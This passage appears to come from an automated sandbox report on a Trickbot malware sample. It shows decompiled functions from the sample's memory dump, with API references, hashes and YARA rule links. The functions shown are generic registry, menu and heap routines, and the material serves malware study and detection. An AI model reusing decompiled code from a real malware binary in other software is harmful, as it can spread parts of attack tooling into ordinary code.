						if(_t19 != 0) {
							goto L2;
						} else {
							_t14 = _v8;
						}
					} else {
						L2:
						_t14 = _a12;
					}
				}
				return _t14;
			}

0x00432064
0x00432065
0x0043206b
0x004320c2
0x0043206d
0x00432070
0x00432075
0x00432079
0x00432092
0x0043209a
0x004320a3
0x004320ac
0x00000000
0x004320ae
0x004320ae
0x004320ae
0x0043207b
0x0043207b
0x0043207b
0x0043207b
0x00432079
0x004320ca

APIs

RegQueryValueExA.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0043209A
RegCloseKey.KERNEL32(00000000,?,?), ref: 004320A3
GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 004320C2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClosePrivateProfileQueryValue
String ID:
API String ID: 1423431592-0
Opcode ID: e7873a9df224d5c80b0f3b4ee5b9dcdea25e4687cee60bc4680a39649fb3ee8e
Instruction ID: 543d6433257c1d13a780289a4184b1cb8692c2bcc61bb3a19cd6e8033d217069
Opcode Fuzzy Hash: e7873a9df224d5c80b0f3b4ee5b9dcdea25e4687cee60bc4680a39649fb3ee8e
Instruction Fuzzy Hash: 5E014B76001118FBCF268F50DD44FDF3B79EB48354F10502AFA159A250D7B5DA1ADBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403750, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403750(void* __ecx, void* __ebp, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v24;
				void* _v32;
				char _v60;
				char _v64;
				void* _v68;
				char _t22;
				void* _t23;
				void* _t30;
				void* _t58;
				intOrPtr _t62;
				void* _t64;

				_push(0xffffffff);
				_push(E00437602);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t58 = __ecx;
				E004321DE();
				E00431F4C(_t58, "Local AppWizard-Generated Applications");
				E00431642(_t58, 4); // executed
				_t22 = E0041BDEB(0x68);
				_t64 = _t62 - 0x28 + 4;
				_v60 = _t22;
				_t68 = _t22;
				_v12 = 0;
				if(_t22 == 0) {
					_t23 = 0;
					__eflags = 0;
				} else {
					_t23 = E0042189A(_t22, _t68, 0x80, 0x4399b8, 0x439de8, 0x439ac0);
				}
				_push(_t23);
				 *((intOrPtr*)(_t64 + 0x38)) = 0xffffffff;
				E00428784(_t58);
				E00431EFF(_t58);
				E00431F29(_t58, 1);
				E00431711(_t64 + 8);
				_v12 = 1;
				E004316BE(_t64 + 8);
				_push( &_v60);
				_t30 = E00431BAD(_t58); // executed
				_t69 = _t30;
				if(_t30 != 0) {
					E0041B7D3( *((intOrPtr*)(_t58 + 0x1c)), 5);
					E0041B53C(UpdateWindow( *( *((intOrPtr*)(_t58 + 0x1c)) + 0x1c)),  *((intOrPtr*)(_t58 + 0x1c)), 1);
					 *((intOrPtr*)(_t64 + 0x34)) = 0xffffffff;
					E0043176C( &_v64, __eflags);
					 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x2c));
					return 1;
				} else {
					_v12 = 0xffffffff;
					E0043176C(_t64 + 8, _t69);
					 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x28));
					return 0;
				}
			}

0x00403750
0x00403752
0x0040375d
0x0040375e
0x00403769
0x0040376b
0x00403777
0x00403780
0x00403787
0x0040378c
0x0040378f
0x00403793
0x00403795
0x0040379d
0x004037bc
0x004037bc
0x0040379f
0x004037b5
0x004037b5
0x004037be
0x004037c1
0x004037c9
0x004037d0
0x004037d9
0x004037e2
0x004037ee
0x004037f6
0x004037ff
0x00403802
0x00403807
0x00403809
0x00403833
0x0040384a
0x00403853
0x0040385b
0x0040386a
0x00403874
0x0040380b
0x0040380f
0x00403817
0x00403823
0x0040382d
0x0040382d

APIs

Part of subcall function 00431642: __EH_prolog.LIBCMT ref: 00431647

Part of subcall function 0041B7D3: ShowWindow.USER32(?,?), ref: 0041B7E1

UpdateWindow.USER32(?), ref: 0040383F

Part of subcall function 0041B53C: DragAcceptFiles.SHELL32(?,?), ref: 0041B543

Part of subcall function 0043176C: __EH_prolog.LIBCMT ref: 00431771

Strings

Local AppWizard-Generated Applications, xrefs: 00403770

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologWindow$AcceptDragFilesShowUpdate
String ID: Local AppWizard-Generated Applications
API String ID: 886253933-3869840320
Opcode ID: b5bf1009b84e540c55149691f0975ee58853b81f5c25ad76d93bff12c1f5a915
Instruction ID: 4bd1b33fc14f8b1641f6f29e9b9eb7fea5ed709321e4f56331090ace76b30e06
Opcode Fuzzy Hash: b5bf1009b84e540c55149691f0975ee58853b81f5c25ad76d93bff12c1f5a915
Instruction Fuzzy Hash: F721E4B4344740ABD214FF25C852B5E77E4AB8CB24F50561EF856873E1CFBC9941878A

Uniqueness

Uniqueness Score: -1.00%

Function 00405159, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00405159(char _a4) {
				void* _t2;
				void* _t7;
				intOrPtr _t8;
				void* _t13;

				_t1 =  &_a4; // 0x402f6a
				_t8 =  *_t1;
				_t13 = _t8 -  *0x4482f4; // 0x3f8
				if(_t13 > 0) {
					L3:
					if(_t8 == 0) {
						_t8 = 1;
					}
					_t2 = RtlAllocateHeap( *0x44d0bc, 0, _t8 + 0x0000000f & 0xfffffff0); // executed
					return _t2;
				}
				E00408042(9);
				_push(_t8);
				_t7 = E0040852F();
				E004080A3(9);
				if(_t7 == 0) {
					goto L3;
				}
				return _t7;
			}

0x0040515a
0x0040515a
0x0040515e
0x00405165
0x00405188
0x0040518a
0x0040518e
0x0040518e
0x0040519e
0x00000000
0x0040519e
0x00405169
0x0040516e
0x00405176
0x00405178
0x00405182
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,j/@,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040519E

Part of subcall function 00408042: InitializeCriticalSection.KERNEL32(00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040807F
Part of subcall function 00408042: EnterCriticalSection.KERNEL32(j/@,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040809A

Part of subcall function 004080A3: LeaveCriticalSection.KERNEL32(?,004053EE,00000009,j/@,0040808E,00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A), ref: 004080B0

Strings

j/@, xrefs: 0040515A, 0040516E, 00405195

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitializeLeave
String ID: j/@
API String ID: 495028619-13740958
Opcode ID: 67373d9968ba6572620ea07a7e28c5e492e8e2e7a079d48d674eb8965deb7954
Instruction ID: 851c18e36aa9611c9f2c034ca3ecedfd94dfcfed3f76d869e41ae1e3cab5b3cd
Opcode Fuzzy Hash: 67373d9968ba6572620ea07a7e28c5e492e8e2e7a079d48d674eb8965deb7954
Instruction Fuzzy Hash: 9DE06532D45D2176D52123297D0179B32119B42760F1A053BFD547F2D6DAB95C02469D

Uniqueness

Uniqueness Score: -1.00%

Function 00431BAD, Relevance: 3.1, APIs: 2, Instructions: 107
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00431BAD(intOrPtr* __ecx) {
				void* __edi;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t34;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr* _t52;
				intOrPtr _t54;
				intOrPtr _t66;
				void* _t73;
				void* _t77;

				E00405340(E00438281, _t73);
				_push(__ecx);
				_t66 =  *((intOrPtr*)(_t73 + 8));
				_t71 = __ecx;
				_t31 =  *((intOrPtr*)(_t66 + 0x10));
				_t54 = 1;
				 *((intOrPtr*)(_t73 - 0x10)) = _t54;
				if(_t31 == 0) {
					_t32 = E00432562();
					_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t32 + 4)))) + 0xc))(0xe100, 0, 0, 0);
					__eflags = _t34;
					if(_t34 == 0) {
						E004283A9(_t71);
					}
					__eflags =  *((intOrPtr*)(_t71 + 0x1c));
					L22:
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x10)) = 0;
					}
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
					return  *((intOrPtr*)(_t73 - 0x10));
				}
				_t77 = _t31 - _t54;
				if(_t77 == 0) {
					_push( *((intOrPtr*)(_t66 + 0x14)));
					__eflags =  *((intOrPtr*)( *__ecx + 0x7c))();
					goto L22;
				}
				if(_t77 <= 0) {
					goto L24;
				}
				if(_t31 <= 3) {
					 *((intOrPtr*)(__ecx + 0x74)) = 0;
					_push( *((intOrPtr*)(_t66 + 0x14)));
					 *((intOrPtr*)( *__ecx + 0x7c))();
					_t52 = __ecx + 0xac;
					 *_t52 = _t66;
					SendMessageA( *( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c), 0x111, 0xe108, 0);
					 *_t52 = 0;
					 *((intOrPtr*)(_t73 - 0x10)) = 0;
					goto L24;
				}
				if(_t31 == 4) {
					 *((intOrPtr*)(__ecx + 0x74)) = 0;
					 *((intOrPtr*)(__ecx + 0xac)) =  *((intOrPtr*)(__ecx + 0x74));
					goto L24;
				}
				_t80 = _t31 - 5;
				if(_t31 != 5) {
					goto L24;
				}
				E00431F3B(__ecx, _t66);
				_t61 = __ecx;
				_t45 = E00431CEE(__ecx, _t80);
				if( *((intOrPtr*)(_t66 + 8)) == 0) {
					_t82 = _t45;
					_push(0xffffffff);
					_push(0);
					if(_t45 == 0) {
						_push(0xf10c);
					} else {
						_push(0xf10b);
					}
					E00428683(_t61, _t82);
				}
				 *((intOrPtr*)(_t73 - 0x10)) = 0;
				if( *((intOrPtr*)(_t71 + 0xac)) == 0) {
					_t46 = E0041BDEB(0x24);
					 *((intOrPtr*)(_t73 + 8)) = _t46;
					 *((intOrPtr*)(_t73 - 4)) = 0;
					if(_t46 == 0) {
						_t47 = 0;
						__eflags = 0;
					} else {
						_t47 = E00431711(_t46);
					}
					 *((intOrPtr*)(_t71 + 0xac)) = _t47;
					 *((intOrPtr*)(_t47 + 0x10)) = 5;
				}
				goto L24;
			}

0x00431bb2
0x00431bb7
0x00431bbb
0x00431bbe
0x00431bc2
0x00431bc7
0x00431bca
0x00431bcd
0x00431cb0
0x00431cc4
0x00431cc7
0x00431cc9
0x00431ccd
0x00431ccd
0x00431cd2
0x00431cd5
0x00431cd5
0x00431cd7
0x00431cd7
0x00431cda
0x00431ce3
0x00431ceb
0x00431ceb
0x00431bd3
0x00431bd5
0x00431ca6
0x00431cac
0x00000000
0x00431cac
0x00431bdb
0x00000000
0x00000000
0x00431be4
0x00431c6e
0x00431c71
0x00431c76
0x00431c7c
0x00431c82
0x00431c94
0x00431c9a
0x00431c9c
0x00000000
0x00431c9c
0x00431bed
0x00431c61
0x00431c64
0x00000000
0x00431c64
0x00431bef
0x00431bf2
0x00000000
0x00000000
0x00431bfa
0x00431bff
0x00431c01
0x00431c09
0x00431c0b
0x00431c0d
0x00431c0f
0x00431c10
0x00431c19
0x00431c12
0x00431c12
0x00431c12
0x00431c1e
0x00431c1e
0x00431c29
0x00431c2c
0x00431c34
0x00431c3a
0x00431c3f
0x00431c42
0x00431c4d
0x00431c4d
0x00431c44
0x00431c46
0x00431c46
0x00431c4f
0x00431c55
0x00431c55
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00431BB2
SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00431C94

Part of subcall function 00431F3B: __EH_prolog.LIBCMT ref: 004334B0

Part of subcall function 00431CEE: __EH_prolog.LIBCMT ref: 00431CF3
Part of subcall function 00431CEE: RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00431DA3
Part of subcall function 00431CEE: RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00431DBD
Part of subcall function 00431CEE: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00431DD9
Part of subcall function 00431CEE: RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00431DEE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog$CloseEnumMessageOpenQuerySendValue
String ID:
API String ID: 941683902-0
Opcode ID: 8617b720564136d3115f4e569a85e01bb61fcbef6e755ee4e443e6530e02ff62
Instruction ID: 7bca6c3130a4eb32da602eb886af723c65e28acfa7fedb001bdca1799f0245df
Opcode Fuzzy Hash: 8617b720564136d3115f4e569a85e01bb61fcbef6e755ee4e443e6530e02ff62
Instruction Fuzzy Hash: 0E318C70780605DFDB249F6AC884A6AB7E4FF4C714F10692FE512DB3A0C778E9418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042D65F, Relevance: 3.1, APIs: 2, Instructions: 71
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0042D65F(void* __ecx, void* __edx, void* __eflags) {
				signed short _t23;
				void* _t26;
				void* _t27;
				void* _t46;
				signed short _t48;
				void* _t52;
				void* _t54;

				_t46 = __edx;
				E00405340(E00437F9C, _t54);
				_t48 =  *(_t54 + 8);
				_t52 = __ecx;
				 *(__ecx + 0x8c) = _t48;
				_t23 =  *0x447478; // 0x44748c
				 *(_t54 + 8) = _t23;
				_t39 = _t54 + 8;
				 *(_t54 - 4) = 0;
				if(E0041C67E(_t54 + 8, __eflags, _t48) != 0) {
					E0041C729(_t52 + 0xac,  *(_t54 + 8), 0, 0xa);
				}
				E0041B266(_t39, 8);
				_t26 = E0042D5DC(_t52,  *((intOrPtr*)(_t54 + 0xc)), _t48);
				_t49 = _t48 & 0x0000ffff;
				_t27 = E0042D44C(_t52, _t26,  *((intOrPtr*)(_t52 + 0xac)),  *((intOrPtr*)(_t54 + 0xc)), 0x44b2c0,  *((intOrPtr*)(_t54 + 0x10)), _t48 & 0x0000ffff, 0,  *((intOrPtr*)(_t54 + 0x14))); // executed
				if(_t27 != 0) {
					 *((intOrPtr*)(_t52 + 0x44)) = GetMenu( *(_t52 + 0x1c));
					E0042CDE1(_t52, _t49);
					if( *((intOrPtr*)(_t54 + 0x14)) == 0) {
						E00419F94(_t46,  *(_t52 + 0x1c), 0x364, 0, 0, 1, 1);
					}
					_push(1);
					_pop(0);
				}
				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
				E00417EC8(_t54 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return 0;
			}

0x0042d65f
0x0042d664
0x0042d66c
0x0042d66f
0x0042d671
0x0042d677
0x0042d67c
0x0042d682
0x0042d685
0x0042d68f
0x0042d69e
0x0042d69e
0x0042d6a5
0x0042d6b0
0x0042d6be
0x0042d6d2
0x0042d6d9
0x0042d6e7
0x0042d6ea
0x0042d6f2
0x0042d702
0x0042d702
0x0042d707
0x0042d709
0x0042d709
0x0042d70a
0x0042d711
0x0042d71e
0x0042d726

APIs

__EH_prolog.LIBCMT ref: 0042D664
GetMenu.USER32(?), ref: 0042D6DE

Part of subcall function 0041C729: lstrlenA.KERNEL32(?), ref: 0041C76D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologMenulstrlen
String ID:
API String ID: 2698981964-0
Opcode ID: 6eb74efce72cb0325ea03ef84f0bc77673097709467e0b10ae5ef2160d13529c
Instruction ID: 81f43602187463fccab8f433ff1bbbb83d7f3fbf6dccc082161f256b0f512f2e
Opcode Fuzzy Hash: 6eb74efce72cb0325ea03ef84f0bc77673097709467e0b10ae5ef2160d13529c
Instruction Fuzzy Hash: 40216F71600314BFDB20AF66DC81F9FBBB9EF45758F00802FB95696191CBB89D40CA64

Uniqueness

Uniqueness Score: -1.00%

Function 0042D44C, Relevance: 3.1, APIs: 2, Instructions: 64
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042D44C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				void* __ebp;
				intOrPtr _t19;
				void* _t23;
				void* _t24;
				struct HMENU__* _t32;
				struct HMENU__* _t39;
				intOrPtr* _t42;

				_t39 = 0;
				_t32 = 0;
				_t42 = __ecx;
				if(_a24 == 0) {
					L3:
					E00418005(_t42 + 0xac, _a8);
					_t19 = _a20;
					if(_t19 != _t39) {
						_t39 =  *((intOrPtr*)(_t19 + 0x1c));
					}
					_t23 = E00418D8E(_t42, _a28, _a4, _a8, _a12,  *_a16,  *((intOrPtr*)(_a16 + 4)),  *((intOrPtr*)(_t20 + 8)) -  *_a16,  *((intOrPtr*)(_t20 + 0xc)) -  *((intOrPtr*)(_a16 + 4)), _t39, _t32, _a32); // executed
					if(_t23 != 0) {
						_t24 = 1;
						return _t24;
					} else {
						if(_t32 != 0) {
							DestroyMenu(_t32);
						}
						L8:
						return 0;
					}
				}
				_t32 = LoadMenuA( *(E00432562() + 0xc), _a24);
				if(_t32 != 0) {
					goto L3;
				}
				 *((intOrPtr*)( *_t42 + 0xa4))();
				goto L8;
			}

0x0042d452
0x0042d454
0x0042d459
0x0042d45b
0x0042d481
0x0042d48a
0x0042d48f
0x0042d494
0x0042d496
0x0042d496
0x0042d4c2
0x0042d4c9
0x0042d4dc
0x00000000
0x0042d4cb
0x0042d4cd
0x0042d4d0
0x0042d4d0
0x0042d4d6
0x00000000
0x0042d4d6
0x0042d4c9
0x0042d46f
0x0042d473
0x00000000
0x00000000
0x0042d479
0x00000000

APIs

LoadMenuA.USER32(?,?), ref: 0042D469
DestroyMenu.USER32(00000000), ref: 0042D4D0

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Menu$DestroyLoad
String ID:
API String ID: 588275208-0
Opcode ID: 47706853f4a671cbe104dc52890ef924e078594bc0a3af00a58dfdc5d928a944
Instruction ID: e96ebaf92d5899408bf20514e4ca51ab90cfcc3861e976c03ff266611ec7aa21
Opcode Fuzzy Hash: 47706853f4a671cbe104dc52890ef924e078594bc0a3af00a58dfdc5d928a944
Instruction Fuzzy Hash: 5A11E776700215BFDB109F65DC84CAB7BA9FF98360B05802AFD06C7221C675EC10CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E873, Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041E873(void* __ebx, void* __ecx) {
				void* __esi;
				void* _t31;
				void* _t33;
				void* _t38;
				signed int _t43;
				signed int _t53;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t61;

				E00405340(E0043886C, _t58);
				_t61 = _t60 - 0xc;
				_t56 = __ecx;
				 *(_t58 - 0x10) = E0041BDEB( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 8)) + 5);
				_t31 = E00432562();
				_t53 = 0;
				_t63 =  *((intOrPtr*)(_t56 + 4));
				 *((intOrPtr*)(_t58 - 0x14)) =  *((intOrPtr*)(_t31 + 4));
				if( *((intOrPtr*)(_t56 + 4)) > 0) {
					_push(__ebx);
					do {
						_t8 = _t53 + 1; // 0x1
						_t43 = _t8;
						wsprintfA( *(_t58 - 0x10),  *(_t56 + 0x10), _t43);
						_t61 = _t61 + 0xc;
						_t38 = E004320CD(_t43,  *((intOrPtr*)(_t58 - 0x14)), _t56, _t63, _t58 - 0x18,  *((intOrPtr*)(_t56 + 0xc)),  *(_t58 - 0x10), 0x449788); // executed
						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
						E00417FB5( *((intOrPtr*)(_t56 + 8)) + _t53 * 4, _t58, _t38);
						 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
						E00417EC8(_t58 - 0x18);
						_t53 = _t43;
					} while (_t53 <  *((intOrPtr*)(_t56 + 4)));
				}
				_t33 = E0041BE14( *(_t58 - 0x10));
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t33;
			}

0x0041e878
0x0041e87d
0x0041e881
0x0041e894
0x0041e897
0x0041e89f
0x0041e8a1
0x0041e8a4
0x0041e8a7
0x0041e8a9
0x0041e8aa
0x0041e8ad
0x0041e8ad
0x0041e8b5
0x0041e8be
0x0041e8d1
0x0041e8d6
0x0041e8e1
0x0041e8e6
0x0041e8ed
0x0041e8f2
0x0041e8f4
0x0041e8f9
0x0041e8fd
0x0041e908
0x0041e910

APIs

__EH_prolog.LIBCMT ref: 0041E878
wsprintfA.USER32 ref: 0041E8B5

Part of subcall function 004320CD: __EH_prolog.LIBCMT ref: 004320D2

Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog$DecrementInterlockedwsprintf
String ID:
API String ID: 1290063344-0
Opcode ID: 0ada101ca65a763d7fea820928f5acd1231f5d235357106bcd8a8491be9f5aed
Instruction ID: bf8af694554d894f91cb280a2967081886eeaf55389991163a7f1de5d21ccf1c
Opcode Fuzzy Hash: 0ada101ca65a763d7fea820928f5acd1231f5d235357106bcd8a8491be9f5aed
Instruction Fuzzy Hash: DE116071900606DFCB14EF69C9859AEF7F8FF54318F10452EE026A3251DB78AD45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043201B, Relevance: 3.0, APIs: 2, Instructions: 33
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0043201B(intOrPtr __ecx, char* _a4) {
				void* _v8;
				int _v12;
				void* _t6;
				void* _t11;
				void* _t14;

				_push(__ecx);
				_push(__ecx);
				_v8 = 0;
				_t6 = E00431F87(__ecx); // executed
				_t14 = _t6;
				if(_t14 != 0) {
					RegCreateKeyExA(_t14, _a4, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
					RegCloseKey(_t14); // executed
					_t11 = _v8;
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x0043201e
0x0043201f
0x00432024
0x00432027
0x0043202c
0x00432030
0x0043204b
0x00432052
0x00432058
0x00432032
0x00432032
0x00432032
0x0043205e

APIs

Part of subcall function 00431F87: RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432007
Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432011

RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,?,00000000,?,?,?,?,004288CA,?), ref: 0043204B
RegCloseKey.KERNEL32(00000000,?,?,?,?,004288CA,?,00000000), ref: 00432052

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseCreate$Open
String ID:
API String ID: 1740278721-0
Opcode ID: 3140004da408bb3239cb69cf8b6d7a668bf622e0d09585c28f15779b78e31d14
Instruction ID: e8dbd2d74003cfe877a5d89efd4f32299761e86c5a92388a5b86f1dfcf205820
Opcode Fuzzy Hash: 3140004da408bb3239cb69cf8b6d7a668bf622e0d09585c28f15779b78e31d14
Instruction Fuzzy Hash: D8E06D76501038BB8B259B96DC49CEFBF7CEF8E7A0B100026F605D2100D6B49A05D6F9

Uniqueness

Uniqueness Score: -1.00%

Function 00433B55, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433B55(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E00432562();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E00432562() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					 *((intOrPtr*)(_t18 + 0x74)) = _a16;
					E00433BB8(_t18, _t31); // executed
				}
				if( *((char*)(E00432562() + 0x14)) == 0) {
					E0041C021();
				}
				_t20 = 1;
				return _t20;
			}

0x00433b5e
0x00433b65
0x00433b67
0x00433b6c
0x00433b70
0x00433b73
0x00433b7b
0x00433b7e
0x00433b80
0x00433b86
0x00433b89
0x00433b90
0x00433b97
0x00433b9c
0x00433b9c
0x00433bab
0x00433bad
0x00433bad
0x00433bb4
0x00433bb5

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0041E93B,00000000,00000000,00000000,00000000,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287), ref: 00433B5E
SetErrorMode.KERNELBASE(00000000,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287,00000000), ref: 00433B65

Part of subcall function 00433BB8: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00433BE9
